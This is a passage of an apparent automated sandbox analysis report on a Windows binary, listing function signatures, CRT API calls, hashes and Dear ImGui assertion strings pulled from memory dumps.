                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6E6E5B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (g.FrameCount == 0 || g.FrameCountEnded == g.FrameCount) && "Forgot to call Render() or EndFrame() at the end of the previous fram$(g.IO.DeltaTime > 0.0f || g.FrameCount == 0) && "Need a positive DeltaTime!"$D:\ALLLLREALSHY\src\$g.IO.DisplaySize.x >= 0.0f && g.IO.DisplaySize.y >= 0.0f && "Invalid DisplaySize value!"$g.IO.Fonts->IsBuilt() && "Font Atlas not built! Make sure you called ImGui_ImplXXXX_NewFrame() function for renderer backend, whic$g.IO.KeyMap[ImGuiKey_Space] != -1 && "ImGuiKey_Space is not mapped, required for keyboard navigation."$g.IO.KeyMap[n] >= -1 && g.IO.KeyMap[n] < 512 && "io.KeyMap[] contains an out of bound value (need to be 0..511, or -1 for unmapped$g.Initialized$g.Style.Alpha >= 0.0f && g.Style.Alpha <= 1.0f && "Invalid style setting!"$g.Style.CircleTessellationMaxError > 0.0f && "Invalid style setting!"$g.Style.ColorButtonPosition == ImGuiDir_Left || g.Style.ColorButtonPosition == ImGuiDir_Right$g.Style.CurveTessellationTol > 0.0f && "Invalid style setting!"$g.Style.WindowMenuButtonPosition == ImGuiDir_None || g.Style.WindowMenuButtonPosition == ImGuiDir_Left || g.Style.WindowMenuButton$g.Style.WindowMinSize.x >= 1.0f && g.Style.WindowMinSize.y >= 1.0f && "Invalid style setting."
                                                                                  • API String ID: 3234217646-3338552399
                                                                                  • Opcode ID: aca7c731a7ce3df739f7431ba5917583052aa4222dfb8565364c0e53f604d81b
                                                                                  • Instruction ID: 4b8d996cc92f62d028e9e84fe329b8d05f0010b5fd9340d772f96ea425e89c7f
                                                                                  • Opcode Fuzzy Hash: aca7c731a7ce3df739f7431ba5917583052aa4222dfb8565364c0e53f604d81b
                                                                                  • Instruction Fuzzy Hash: 9C717F31A1AA97D0E711AF2BDC441B86361FF22B44F486971F90D971E4DF6CE649CB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (g.CurrentWindowStack.Size == 1) && "Mismatched Begin/BeginChild vs End/EndChild calls: did you call End/EndChild too much?"$(g.CurrentWindowStack.Size == 1) && "Mismatched Begin/BeginChild vs End/EndChild calls: did you forget to call End/EndChild?"$(g.GroupStack.Size == 0) && "Missing EndGroup call!"$(key_mods == 0 || g.IO.KeyMods == key_mods) && "Mismatching io.KeyCtrl/io.KeyShift/io.KeyAlt/io.KeySuper vs io.KeyMods"$...$Calling io.SetPlatformImeDataFn(): WantVisible: %d, InputPos (%.2f,%.2f)$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$g.Initialized$g.Windows.Size == g.WindowsTempSortBuffer.Size$g.WithinFrameScope && "Forgot to call ImGui::NewFrame()?"$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-921266350
                                                                                  • Opcode ID: bb648955b63763a60127585234fe013acbb12d1272c25690ae84778496c83eb4
                                                                                  • Instruction ID: 2155a1b00fc8d82a5acd959d08a14bb2aaa9aa6ba2ec2910cffe27aeb5f095df
                                                                                  • Opcode Fuzzy Hash: bb648955b63763a60127585234fe013acbb12d1272c25690ae84778496c83eb4
                                                                                  • Instruction Fuzzy Hash: 07D1BF36A0AAC685EB11EF26D8801B937A5FB61B44F983535FA0DC72D8DF6CE900D710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$idx == 0 || idx == 1
                                                                                  • API String ID: 3234217646-38430178
                                                                                  • Opcode ID: c1a6dfd08eddd01d72c801346c2b5d30a5a256a8e7bf10d5e1e9ea9941882d10
                                                                                  • Instruction ID: bfe3a1aacd985f67cbfd12998048a05085f06c17b02909e615ef9fca25b35026
                                                                                  • Opcode Fuzzy Hash: c1a6dfd08eddd01d72c801346c2b5d30a5a256a8e7bf10d5e1e9ea9941882d10
                                                                                  • Instruction Fuzzy Hash: 25D1C435A1AE4A85E7219F27D8402F57360FF66744F48AB32EA4EA31A0DF6CF544D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0$g.WindowsFocusOrder[cur_order] == window$g.WindowsFocusOrder[n]->FocusOrder == n$i >= 0 && i < Size$window == window->RootWindow
                                                                                  • API String ID: 3234217646-319768107
                                                                                  • Opcode ID: 25c29d050843c534faf83c26f574b738bdd65db1eeaa14b5129adceac6df2f7b
                                                                                  • Instruction ID: 6794ad2d99317732d5422bb7755cc242ce68d21d53981f7a427d53586397e90e
                                                                                  • Opcode Fuzzy Hash: 25c29d050843c534faf83c26f574b738bdd65db1eeaa14b5129adceac6df2f7b
                                                                                  • Instruction Fuzzy Hash: 3A51B222B1AE97D0EB11EF0BEC402A96726FB61B44F442532E90E876E4CF7DE546C710
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE6F7A10: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6AE6F754E,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F7A46
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F7595
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F763F
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F76AC
                                                                                  • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F76CB
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F772A
                                                                                  • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F776E
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F78DF
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F7903
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F7923
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F7979
                                                                                  • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6F276A), ref: 00007FF6AE6F79E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memcmpmemcpy$memmove
                                                                                  • String ID: $D:\ALLLLREALSHY\src\$Size > 0$i >= 0 && i < Size$it >= Data && it < Data + Size
                                                                                  • API String ID: 1556007323-1924924387
                                                                                  • Opcode ID: dff96fd94c0539ec96d937ee69a90f8e0d419f563db042c34a9b1656436e68bd
                                                                                  • Instruction ID: 8b74a02dc5a196214d5b8a48d88cb77f113e55c8f5d7e48dcf10350738664980
                                                                                  • Opcode Fuzzy Hash: dff96fd94c0539ec96d937ee69a90f8e0d419f563db042c34a9b1656436e68bd
                                                                                  • Instruction Fuzzy Hash: 6FE1F272B1AA4286EB20EF16E4403A977A0FF64B84F41A43AEA4D87794DF7DF445C740
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: !ImGui::IsAliasKey(key)$(BackendUsingLegacyKeyArrays == -1 || BackendUsingLegacyKeyArrays == 0) && "Backend needs to either only use io.AddKeyEvent(), eit$Ctx != 0$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$ImGui::IsNamedKeyOrModKey(key)$KeyMap[n] == -1 && "Backend needs to either only use io.AddKeyEvent(), either only fill legacy io.KeysDown[] + io.KeyMap[]. Not bo$i >= 0 && i < Size$key != ImGuiMod_Shortcut
                                                                                  • API String ID: 3234217646-2549429811
                                                                                  • Opcode ID: 8bb679d8ef1e12715cea7a329922a7db3915a75f91819551a89f8408590785e7
                                                                                  • Instruction ID: 62f3b56ff4b257c05adfaf5b9a5516577bd3f7e895acd6b005c5739ef098428b
                                                                                  • Opcode Fuzzy Hash: 8bb679d8ef1e12715cea7a329922a7db3915a75f91819551a89f8408590785e7
                                                                                  • Instruction Fuzzy Hash: 3581F726A0AE8681E771AF2AD8803B973A0FBB4704F946531F64E836D4DF3CE945D700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7D31
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7D6D
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7DA4
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7DD8
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7E00
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7E24
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7E81
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7EC2
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7F0A
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7F3A
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7F8A
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6F7BC5), ref: 00007FF6AE6F7FB6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$free
                                                                                  • String ID: !Locked && "Cannot modify a locked ImFontAtlas between NewFrame() and EndFrame/Render()!"$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 523432916-4130824056
                                                                                  • Opcode ID: 1d2cabab125e25a692046c9309620ae4bcd8f1efa00a86fc163fd839da0936ca
                                                                                  • Instruction ID: cdd9b4ea4ba102b6ff5b49ee9e75d443721cf30380b41e0d07ddfd66d58245d0
                                                                                  • Opcode Fuzzy Hash: 1d2cabab125e25a692046c9309620ae4bcd8f1efa00a86fc163fd839da0936ca
                                                                                  • Instruction Fuzzy Hash: BD819135A2BA5281EB20AF1BE4502B87721FF64B54F446536E91D87BA4CF3DF841C750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memchrmemcpy
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$g.Initialized$i >= 0 && i < Size
                                                                                  • API String ID: 2533955962-872282394
                                                                                  • Opcode ID: 05ae5f96afe67845eabae92cc4213053ba48ace30d17b4240ad90121b4cc49a7
                                                                                  • Instruction ID: 900c08c39e204b03c11a76a4df936325dea9ffb129a129374c660d94b20e5cca
                                                                                  • Opcode Fuzzy Hash: 05ae5f96afe67845eabae92cc4213053ba48ace30d17b4240ad90121b4cc49a7
                                                                                  • Instruction Fuzzy Hash: F6A1C222B0AE8791EA24AB179C842B97751FB65B80F446436EA6EC73D4DF2CF445D700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D8594), ref: 00007FF6AE6EFEAD
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D8594), ref: 00007FF6AE6EFEE0
                                                                                    • Part of subcall function 00007FF6AE6D4600: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6AE6D4643
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D8594), ref: 00007FF6AE6EFF29
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D8594), ref: 00007FF6AE6EFF62
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D8594), ref: 00007FF6AE6EFF97
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D8594), ref: 00007FF6AE6EFFCC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$__stdio_common_vsprintf
                                                                                  • String ID: %.*s$(void*)0x%p$0x%08X [override]$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size$info->ID == id && info->QueryFrameCount > 0$tool->StackLevel >= 0
                                                                                  • API String ID: 1218362576-3149473475
                                                                                  • Opcode ID: 008b05e8315b4546084dc23bc7941438d10ef6e86c900a2df04e69fe161cbeb6
                                                                                  • Instruction ID: a204fe9e9f51f454413ef0b6849e583b5f14c32b0685138dec9b706ec5b4e9e1
                                                                                  • Opcode Fuzzy Hash: 008b05e8315b4546084dc23bc7941438d10ef6e86c900a2df04e69fe161cbeb6
                                                                                  • Instruction Fuzzy Hash: CE81D122A1AE8392E720EF26D8902B86361FB65B44F547632EA1DC76D4DF7CE941C300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: #SCROLLX$#SCROLLY$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$idx == 0 || idx == 1$scrollbar_size > 0.0f
                                                                                  • API String ID: 3234217646-1824643082
                                                                                  • Opcode ID: 94db7f2af47aa27c8a2deb45e4542dcc88262b87f861fa5e12f8199cab3150aa
                                                                                  • Instruction ID: cb7c0c594d0830f2d5b6f6ac55734026290eec87ecee77dbce420a837ad145ea
                                                                                  • Opcode Fuzzy Hash: 94db7f2af47aa27c8a2deb45e4542dcc88262b87f861fa5e12f8199cab3150aa
                                                                                  • Instruction Fuzzy Hash: E8811731A19A4A95E711AF27E8401B97370FF79784F489332FA4DA6160DF7EE685C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$memmove
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0$cmd.ElemCount == 6$i >= 0 && i < Size$it >= Data && it <= Data + Size
                                                                                  • API String ID: 1822516562-3503408460
                                                                                  • Opcode ID: 0a3ebb338dfe5b7fa61b4ae4e715c71b07efc20b5bf813f9bc72734f268b2905
                                                                                  • Instruction ID: e20eae5e1ed685bae4c32db0ed67157a28b5b2292bef8b7a861a09754b032cd7
                                                                                  • Opcode Fuzzy Hash: 0a3ebb338dfe5b7fa61b4ae4e715c71b07efc20b5bf813f9bc72734f268b2905
                                                                                  • Instruction Fuzzy Hash: 5191B526A19AC581E710DF2AE4803B97360FFA5B44F44B732EA4D576A8DF6CE581D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
